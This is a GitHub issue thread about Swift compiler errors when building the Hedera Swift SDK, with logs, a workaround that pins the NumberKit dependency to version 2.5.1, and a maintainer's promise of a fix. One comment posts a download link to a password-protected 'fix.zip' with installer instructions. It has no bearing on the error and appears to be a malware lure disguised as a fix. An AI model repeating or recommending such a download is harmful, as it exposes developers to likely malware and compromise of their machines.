### ISSUE TITLE
Type 'UInt64' does not conform to protocol 'IntegerNumber'

### ISSUE THREAD

**Issue by ramesh-aureus** [hashgraph/hedera-sdk-swift#377]
### Description

This is the error im getting while running hedera swift sdk.

Could not build the precompiled application for the device.
Swift Compiler Error (Xcode): Type 'UInt64' does not conform to protocol 'IntegerNumber'
/Users/darkness/Library/Developer/Xcode/DerivedData/Runner-dvtigcgisdkkghcsrzomqcuqdlmc/SourcePackages/checkouts/hedera-sdk-swift/Sources/Hedera/CustomFee.swift:301:16

Swift Compiler Error (Xcode): Type 'UInt64' does not conform to protocol 'IntegerNumber'
/Users/darkness/Library/Developer/Xcode/DerivedData/Runner-dvtigcgisdkkghcsrzomqcuqdlmc/SourcePackages/checkouts/hedera-sdk-swift/Sources/Hedera/CustomFee.swift:332:23

Swift Compiler Error (Xcode): Type 'UInt64' does not conform to protocol 'IntegerNumber'
/Users/darkness/Library/Developer/Xcode/DerivedData/Runner-dvtigcgisdkkghcsrzomqcuqdlmc/SourcePackages/checkouts/hedera-sdk-swift/Sources/Hedera/CustomFee.swift:350:42

Swift Compiler Error (Xcode): Type 'UInt64' does not conform to protocol 'IntegerNumber'
/Users/darkness/Library/Developer/Xcode/DerivedData/Runner-dvtigcgisdkkghcsrzomqcuqdlmc/SourcePackages/checkouts/hedera-sdk-swift/Sources/Hedera/CustomFee.swift:470:23

Swift Compiler Error (Xcode): Type 'UInt64' does not conform to protocol 'IntegerNumber'
/Users/darkness/Library/Developer/Xcode/DerivedData/Runner-dvtigcgisdkkghcsrzomqcuqdlmc/SourcePackages/checkouts/hedera-sdk-swift/Sources/Hedera/CustomFee.swift:517:30

Swift Compiler Error (Xcode): Type 'UInt64' does not conform to protocol 'IntegerNumber'
/Users/darkness/Library/Developer/Xcode/DerivedData/Runner-dvtigcgisdkkghcsrzomqcuqdlmc/SourcePackages/checkouts/hedera-sdk-swift/Sources/Hedera/CustomFee.swift:535:56

Swift Compiler Error (Xcode): No type for 'T' can satisfy both 'T == UInt64' and 'T : IntegerNumber'
/Users/darkness/Library/Developer/Xcode/DerivedData/Runner-dvtigcgisdkkghcsrzomqcuqdlmc/SourcePackages/checkouts/hedera-sdk-swift/Sources/Hedera/Protobufs/Rational+ProtobufCodable.swift:3:36

Swift Compiler Error (Xcode): No type for 'T' can satisfy both 'T == UInt64' and 'T : SignedInteger'
/Users/darkness/Library/Developer/Xcode/DerivedData/Runner-dvtigcgisdkkghcsrzomqcuqdlmc/SourcePackages/checkouts/hedera-sdk-swift/Sources/Hedera/Protobufs/Rational+ProtobufCodable.swift:3:36

Swift Compiler Error (Xcode): No type for 'T' can satisfy both 'T == UInt64' and 'T : SignedNumeric'
/Users/darkness/Library/Developer/Xcode/DerivedData/Runner-dvtigcgisdkkghcsrzomqcuqdlmc/SourcePackages/checkouts/hedera-sdk-swift/Sources/Hedera/Protobufs/Rational+ProtobufCodable.swift:3:36

Uncategorized (Xcode): Command SwiftCompile failed with a nonzero exit code

### Steps to reproduce

1) Add the package using URL 
2) Run the app

### Additional context

<img width="1640" alt="Screenshot 2024-08-26 at 5 33 38 PM" src="https://github.com/user-attachments/assets/4df7b488-2212-4f00-9306-5b76e80aa056">

### Hedera network

mainnet

### Version

latest 

### Operating system

macOS

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nirmalpatidar123** [comment]
@ramesh-aureus I'm also facing same issue. This is because of a dependancy integrated by this library.
[NumberKit](https://github.com/objecthub/swift-numberkit.git)
I have manually added this dependancy into my XCode project with **exactVersion 2.5.1** and now issue has been resolved.

**Comment by ramesh-aureus** [comment]
Thank you for the response @nirmalpatidar123 . I did as u mentioned.. but im getting another kind of error.:

Could not build the precompiled application for the device.
Swift Compiler Error (Xcode): Extraneous argument labels 'numerator:denominator:' in call
/Users/darkness/Library/Developer/Xcode/DerivedData/Runner-dvtigcgisdkkghcsrzomqcuqdlmc/SourcePackages/checkouts/hedera-sdk-swift/Sources/Hedera/CustomFee.swift:335:27

Swift Compiler Error (Xcode): Referencing instance method 'toProtobuf()' on 'Rational' requires the types 'UInt64' and 'Int64' be equivalent
/Users/darkness/Library/Developer/Xcode/DerivedData/Runner-dvtigcgisdkkghcsrzomqcuqdlmc/SourcePackages/checkouts/hedera-sdk-swift/Sources/Hedera/CustomFee.swift:430:44

Swift Compiler Error (Xcode): Extraneous argument labels 'numerator:denominator:' in call
/Users/darkness/Library/Developer/Xcode/DerivedData/Runner-dvtigcgisdkkghcsrzomqcuqdlmc/SourcePackages/checkouts/hedera-sdk-swift/Sources/Hedera/CustomFee.swift:522:36

Swift Compiler Error (Xcode): Referencing instance method 'toProtobuf()' on 'Rational' requires the types 'UInt64' and 'Int64' be equivalent
/Users/darkness/Library/Developer/Xcode/DerivedData/Runner-dvtigcgisdkkghcsrzomqcuqdlmc/SourcePackages/checkouts/hedera-sdk-swift/Sources/Hedera/CustomFee.swift:594:61

**Comment by SimiHunjan** [comment]
Will be released in the next version in the next day or so
